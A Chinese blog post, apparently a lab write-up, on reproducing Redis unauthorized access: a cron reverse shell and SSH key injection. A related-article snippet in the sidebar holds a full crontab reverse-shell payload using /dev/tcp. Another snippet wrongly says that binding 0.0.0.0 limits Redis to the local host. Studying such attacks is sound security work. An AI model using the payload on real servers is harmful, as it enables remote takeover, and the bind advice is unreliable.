redis未授权访问漏洞复现

已于 2022-10-06 11:23:50 修改
阅读量305 收藏 1
点赞数
分类专栏: vulhub复现 文章标签: redis 数据库 java
于 2022-10-06 11:22:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70483044/article/details/127181005
版权

目录

redis

漏洞原因

什么是未授权访问漏洞

漏洞复现

redis

Redis 是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件. 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询.

​redis是一个开源的存储系统,支持数据的持久化存储、支持key-value、list、set等数据结构存储,支持备份。

​但若redis存在未授权访问,就会导致攻击者可以无需认证就能访问redis内部资源,获取敏感文件,甚至执行flushall清空数据,给root账户写入ssh公钥直接远程登录目的服务器。

漏洞原因

Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生,严重危害业务正常服务。  部分服务器上的Redis 绑定在 0.0.0.0:6379,并且没有开启认证(这是Redis 的默认配置),以及该端口可以通过公网直接访问,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,可能造成其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。目前比较主流的案例:yam2 minerd 挖矿程序,还有在多次应急事件中发现大量的watch-smartd挖矿木马。​

什么是未授权访问漏洞

​未授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处未对当前用户进行权限识别,导致攻击者在没有获取到登录权限或未授权的情况下,对目标进行操作或者被信息泄露。

漏洞复现

利用railgun工具扫描靶机redis所在端口​

靶机在6379开启的redis服务

​1.验证是否存在未授权访问漏洞

​连接成功存在

2.(1)利用cron计划执行命令反弹shell

​在redis是以root权限运行时,我们可以通过写crontab(计划任务)来执行命令反弹shell。

​首先攻击机开启监听6666端口

然后执行命令

(2)写ssh-keygen公钥然后使用私钥登陆

​首先攻击机在本地生成一对密钥

​ssh-keygen -t rsa

​ 

​ 

​ 

小杜不饿
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-29 1256
简介 Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下授权访问Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录...
利用Weblogic中间件存在的SSRF漏洞结合redis授权访问漏洞GetShell
wenqingshuo321的博客
10-11 735
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
nodejs-api-template:使用NodeJS API模板快速创建API。 建立在Express,MySQL和Redis之上
05-27
NODE JS API模板自述文件 使用此Node JS模板为您的应用程序快速构建所需的API。 该模板包括用户和书籍组件。 图书组件可用于创建出版物,图书馆,城市,国家等组件。 技术栈- 语言-NodeJS / Javascript 数据库-MySQL,MongoDB 缓存-Redis 基于Checkout组件的NodeJS API模板- Git回购-() 特征 - 基于Express frameowrk构建() 带Sequelize ORMMySQL DB() 带Mongoose ORM的Mongo DB() 使用Hapi Joi进行API验证() 使用JWT令牌进行身份验证() API速率限制() 每天使用Winston记录器记录错误() 使用Multer上传文件中间件() 基于最新的NPM模块构建,模块内部具有0个漏洞(通过运行npm audit检查模块漏
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具, 不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力,并且提供了钩子(hook)使其拥有很好地扩展性。除了一个命令行界面,该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。
8~15k,网络安全面试真题.pdf
02-05
一部分题型如下: 1. 介绍下sql注入 2. 工作中常用的安全设备 3. 有没有用过态势感知? 4. 之前工作经验? 5. 怎么做安全加固? 6. 怎么提权? 7. 渗透流程? 8. 介绍下黄金票据、白银票据? 9. Windows、Linux常用漏洞及编号? 10. Windows常用端口? 11. 介绍下反序列化漏洞? 12. 介绍下redis? 13. 怎么做基线检查? 14. 常用的渗透工具? 15. 被动扫描模式是什么? 16. 远程代码执行漏洞? 17. waf绕过? 18. 文件上传怎么绕过? 19. 怎么对文件内容过滤? 20. 怎么排查攻击来源? 21. 介绍下了解的中间件以及中间件漏洞? 22. 中间件日志分析、Windows、Linux日志分析? 23. 你觉得msf工具最好用的模块? 24. 之前工作的比赛、护网经验? 25. 渗透报告内容都有哪些?
202315-消息中间件MQ面试题(2023最新版)思维导图.zip
06-16
1. Java基础知识: - 语法 - 面向对象编程 - 集合框架 - 异常处理 - 多线程编程 2. 数据库: - 熟悉SQL语言 - 了解关系型数据库和非关系型数据库 - 数据库连接池 - 数据库事务 3. Spring框架: - Spring Boot - Spring MVC - Spring Data - Spring Security - Spring Cloud 4. Web开发: - HTML、CSS、JavaScript - HTTP协议 - Servlet、JSP - AJAX、JSON、XML 5. 框架和工具: - MyBatis - Hibernate - Maven、Gradle - Git、SVN - IntelliJ IDEA、Eclipse 6. 微服务: - RESTful API - Spring Cloud Netflix - Docker、Kubernetes 7. 缓存: - Redis - Memcached 8. 消息队列: - RabbitMQ - Kafka 9. 性能优化: - JVM调优 - Tomcat调优 - 数据库调优 10. 安全: - XSS、CSRF、SQL注入等常见安全漏洞 - Spring Security安全框架 以上是Java后端必会的所有技能,掌握这些技能可以帮助开发人员在Java后端开发领域更加得心应手。
Redis授权访问漏洞简单复现
m0_48867141的博客
03-22 3889
1.Redis简介 Redis是一个开源的,可持久化的日志型,Key-Value数据库。 2.漏洞简介 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访...
Redis授权访问漏洞复现
xunhuanmao的博客
09-22 2031
Redis授权访问漏洞的环境搭建以及利用方式。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Redis基础总结
weixin_49406295的博客
08-17 489
1、Redis服务搭建(windows版) 2、Redis常用命令 3、分布式锁 4、Redis缓存问题 4.1 缓存更新策略 4.2 缓存穿透 4.3 缓存雪崩 4.4 缓存击穿 5、Redis集群 5.1 主从集群 5.2 哨兵集群 5.3 分片集群 8、Redis客户端代码(go版本) 9、Redis漏洞 9.1 沙盒逃逸漏洞 9.2 Lua子系统缓冲区错误漏洞 9.3 Lua子系统数字错误漏洞 9.4 Redis授权访问 9.5 Redis安全部署建议............
Redis漏洞总结
2301_77498991的博客
04-10 652
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。但是要保证硬盘文件不被删除,而主从复制则能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis
Redis 授权访问漏洞复现
huangyongkang666的博客
05-01 3118
Redis 授权访问漏洞复现 1.Redis 简介 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个开源的、使用c语言编写的NoSQL数据库Redis基于内存运行并支持持久化(支持存储在磁盘),采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。 Redis器程序是单进程模型 Red
redis授权访问漏洞修复
最新发布
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值